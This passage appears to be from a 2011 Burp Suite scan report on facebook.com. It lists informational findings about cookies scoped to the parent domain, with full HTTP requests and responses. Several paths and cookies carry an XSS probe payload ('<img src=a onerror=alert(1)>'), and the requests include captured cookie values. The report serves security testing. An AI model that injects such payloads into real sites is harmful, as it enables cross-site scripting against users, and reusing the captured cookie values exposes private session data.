"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.12. http://www.facebook.com/10000082482078341583

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.139.31
Connection: close
Date: Thu, 05 May 2011 11:43:13 GMT
Content-Length: 11422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.13. http://www.facebook.com/10000082482078341583ab0e5e0e0bd

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /10000082482078341583<img%20src=a%20onerror=alert(1)>ab0e5e0e0bd HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.187.55
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 11470

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.14. http://www.facebook.com/1242845259

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1242845259 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; wd=1022x1007

Response

HTTP/1.1 404 Not Found
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.96.57
X-Cnection: close
Date: Thu, 05 May 2011 11:56:38 GMT
Content-Length: 11260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.15. http://www.facebook.com/1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
  • reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1242845259e76bc%3Cimg%20src=a%20onerror=alert(1)%3Eb0233c9330b HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://burp/show/12
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; lsd=zTWKd; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; datr=ituyTcnawc6q7VcE0gibPCo2; act=1304613672018%2F1; L=2; reg_fb_ref=https%3A%2F%2Fwww.facebook.com%2Fhelp%2Fcontact.php%3Fshow_form%3Dcannot_identify%26flow%3Dpw_reset; wd=1022x1007

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F12; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F1242845259e76bc%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eb0233c9330b; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.102.67
X-Cnection: close
Date: Thu, 05 May 2011 11:56:26 GMT
Content-Length: 11478

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.16. http://www.facebook.com/2008/fbml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.145.67
Connection: close
Date: Thu, 05 May 2011 11:40:11 GMT
Content-Length: 11283

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.17. http://www.facebook.com/AOLrealestate

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /AOLrealestate

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /AOLrealestate HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.181.29
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 37726

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.18. http://www.facebook.com/BPAmerica

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /BPAmerica

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /BPAmerica HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=xCqlG; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=907x1007; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.217.127
Connection: close
Date: Thu, 05 May 2011 10:56:36 GMT
Content-Length: 183008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.19. http://www.facebook.com/DailyFinance

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /DailyFinance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /DailyFinance HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.168.69
Connection: close
Date: Thu, 05 May 2011 11:42:19 GMT
Content-Length: 197840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

10.20. http://www.facebook.com/HockeyKen

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /HockeyKen

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /HockeyKen HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FHockeyKen; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.195.39
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 79629

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.21. http://www.facebook.com/KickIceForever

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /KickIceForever

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /KickIceForever HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FKickIceForever; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.194.43
Connection: close
Date: Thu, 05 May 2011 11:42:23 GMT
Content-Length: 72255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.22. http://www.facebook.com/LadyBonesie

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /LadyBonesie

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /LadyBonesie HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.167.61
Connection: close
Date: Thu, 05 May 2011 11:43:11 GMT
Content-Length: 14829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

10.23. http://www.facebook.com/Loizza

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /Loizza

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:
  • reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Loizza HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; lsd=zTWKd; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpeople%2FBucky-Jordan%2F100000824820783; wd=deleted; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F10000082482078341583%253Cimg%2520src%3Da%2520onerror%3Dalert%281%29%253Eab0e5e0e0bd; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS; reg_ext_ref=http%3A%2F%2Fburp%2Fshow%2F11;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2FLoizza; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.190.69
Connection: close
Date: Thu, 05 May 2011 11:42:51 GMT
Content-Length: 228078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xml:lang="en" l
...[SNIP]...

10.24. http://www.facebook.com/aim

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /aim

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:
  • wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /aim HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
